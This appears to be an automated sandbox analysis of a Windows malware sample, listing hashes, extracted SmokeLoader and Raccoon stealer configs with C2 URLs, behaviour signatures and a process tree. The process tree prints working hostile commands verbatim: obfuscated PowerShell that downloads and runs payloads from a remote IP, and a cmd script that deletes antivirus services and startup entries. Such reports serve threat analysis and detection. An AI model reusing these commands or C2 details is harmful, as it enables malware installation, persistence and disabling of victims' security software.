Analysis

  • max time kernel
    152s
  • max time network
    155s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    13-08-2021 10:05

General

  • Target

    b5de39be28a0649ef87494a658668e13.exe

  • Size

    180KB

  • MD5

    b5de39be28a0649ef87494a658668e13

  • SHA1

    92e28e70185243da45ee2432241a58b0d4e7fda3

  • SHA256

    138d79111af4f878d637e1a8dcf7dbdd46f70527eb68908ad2f977a3554031eb

  • SHA512

    2065705100b75f249a6d558342b228442785c0848e027c805e7785de954d7dce93a015e4be9d1ce80a26d5e5bb22d0b4d788ee02dea22413f35a227928608e31

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://193.56.146.55/Api/GetFile2

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

471c70de3b4f9e4d493e418d1f60a90659057de0

Attributes
  • url4cnc

    https://telete.in/p1rosto100xx

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

cd8dc1031358b1aec55cc6bc447df1018b068607

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Signatures

  • Detected phishing page
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 7 IoCs
  • Deletes itself 1 IoCs
  • Drops startup file 3 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 18 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b5de39be28a0649ef87494a658668e13.exe
    "C:\Users\Admin\AppData\Local\Temp\b5de39be28a0649ef87494a658668e13.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4012
    • C:\Users\Admin\AppData\Local\Temp\b5de39be28a0649ef87494a658668e13.exe
      "C:\Users\Admin\AppData\Local\Temp\b5de39be28a0649ef87494a658668e13.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:2680
  • C:\Users\Admin\AppData\Local\Temp\CAF7.exe
    C:\Users\Admin\AppData\Local\Temp\CAF7.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    PID:1348
  • C:\Users\Admin\AppData\Local\Temp\CF4D.exe
    C:\Users\Admin\AppData\Local\Temp\CF4D.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:3300
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3300 -s 792
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:3968
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3300 -s 880
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:1496
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3300 -s 792
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:2724
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3300 -s 916
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:2304
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3300 -s 884
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:2732
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3300 -s 976
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:2388
    • C:\ProgramData\Runtimebroker.exe
      "C:\ProgramData\Runtimebroker.exe"
      2⤵
      • Executes dropped EXE
      • Drops startup file
      • Suspicious use of WriteProcessMemory
      PID:2156
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 736
        3⤵
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:1972
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 788
        3⤵
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:3516
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 760
        3⤵
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:3940
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 800
        3⤵
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:2108
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 980
        3⤵
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:3128
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 1036
        3⤵
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:2244
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
        3⤵
        • Adds Run key to start application
        • Suspicious use of AdjustPrivilegeToken
        PID:2128
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://193.56.146.55/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2736
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "powershell" Get-MpPreference -verbose
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4300
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
          4⤵
            PID:4604
    • C:\Users\Admin\AppData\Local\Temp\D190.exe
      C:\Users\Admin\AppData\Local\Temp\D190.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2120
      • C:\Windows\SysWOW64\cmd.exe
        cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
        2⤵
        • Drops startup file
        PID:1092
    • C:\Users\Admin\AppData\Local\Temp\D347.exe
      C:\Users\Admin\AppData\Local\Temp\D347.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3856
      • C:\Users\Admin\AppData\Local\Temp\D347.exe
        C:\Users\Admin\AppData\Local\Temp\D347.exe
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:4192
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 1464
          3⤵
          • Program crash
          • Suspicious use of AdjustPrivilegeToken
          PID:4520
    • C:\Users\Admin\AppData\Local\Temp\2976.exe
      C:\Users\Admin\AppData\Local\Temp\2976.exe
      1⤵
      • Executes dropped EXE
      PID:4440
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 732
        2⤵
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:4608
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 748
        2⤵
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:4660
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 752
        2⤵
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:4728
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 892
        2⤵
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:4824
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 704
        2⤵
        • Suspicious use of NtCreateProcessExOtherParentProcess
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:4852
    • C:\Windows\SysWOW64\explorer.exe
      C:\Windows\SysWOW64\explorer.exe
      1⤵
        PID:4480
      • C:\Windows\explorer.exe
        C:\Windows\explorer.exe
        1⤵
          PID:4564
        • C:\Windows\SysWOW64\explorer.exe
          C:\Windows\SysWOW64\explorer.exe
          1⤵
            PID:4748
          • C:\Windows\explorer.exe
            C:\Windows\explorer.exe
            1⤵
              PID:4928
            • C:\Windows\SysWOW64\explorer.exe
              C:\Windows\SysWOW64\explorer.exe
              1⤵
                PID:4368
              • C:\Windows\explorer.exe
                C:\Windows\explorer.exe
                1⤵
                  PID:4448
                • C:\Windows\SysWOW64\explorer.exe
                  C:\Windows\SysWOW64\explorer.exe
                  1⤵
                    PID:4872
                  • C:\Windows\explorer.exe
                    C:\Windows\explorer.exe
                    1⤵
                      PID:4256
                    • C:\Windows\SysWOW64\explorer.exe
                      C:\Windows\SysWOW64\explorer.exe
                      1⤵
                        PID:4496

                      Network

                      MITRE ATT&CK Matrix ATT&CK v6

                      Persistence

                      Modify Existing Service

                      1
                      T1031

                      Registry Run Keys / Startup Folder

                      1
                      T1060

                      Defense Evasion

                      Modify Registry

                      2
                      T1112

                      Disabling Security Tools

                      1
                      T1089

                      Credential Access

                      Credentials in Files

                      1
                      T1081

                      Discovery

                      System Information Discovery

                      2
                      T1082

                      Query Registry

                      1
                      T1012

                      Peripheral Device Discovery

                      1
                      T1120

                      Collection

                      Data from Local System

                      1
                      T1005

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\ProgramData\Runtimebroker.exe
                        MD5

                        4710cad4ef7196e4cddb126e70e58094

                        SHA1

                        acce1f47d643fc630cddece0dfd5df493b963c91

                        SHA256

                        87d77f198d287a93f890bd8eaa311d5190655aa2d4023c5a957fc9653389b04e

                        SHA512

                        2a2b70ba42923c34691fc96d0323181d1004979c64ab792f834f6fe18a785f3a6476f969c780ebc8d2d81f1cbfd3f335bc0a4a7e3e74fa248afbb64f97655d57

                      • C:\ProgramData\Runtimebroker.exe
                        MD5

                        4710cad4ef7196e4cddb126e70e58094

                        SHA1

                        acce1f47d643fc630cddece0dfd5df493b963c91

                        SHA256

                        87d77f198d287a93f890bd8eaa311d5190655aa2d4023c5a957fc9653389b04e

                        SHA512

                        2a2b70ba42923c34691fc96d0323181d1004979c64ab792f834f6fe18a785f3a6476f969c780ebc8d2d81f1cbfd3f335bc0a4a7e3e74fa248afbb64f97655d57

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                        MD5

                        6bf0e5945fb9da68e1b03bdaed5f6f8d

                        SHA1

                        eed3802c8e4abe3b327c100c99c53d3bbcf8a33d

                        SHA256

                        dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1

                        SHA512

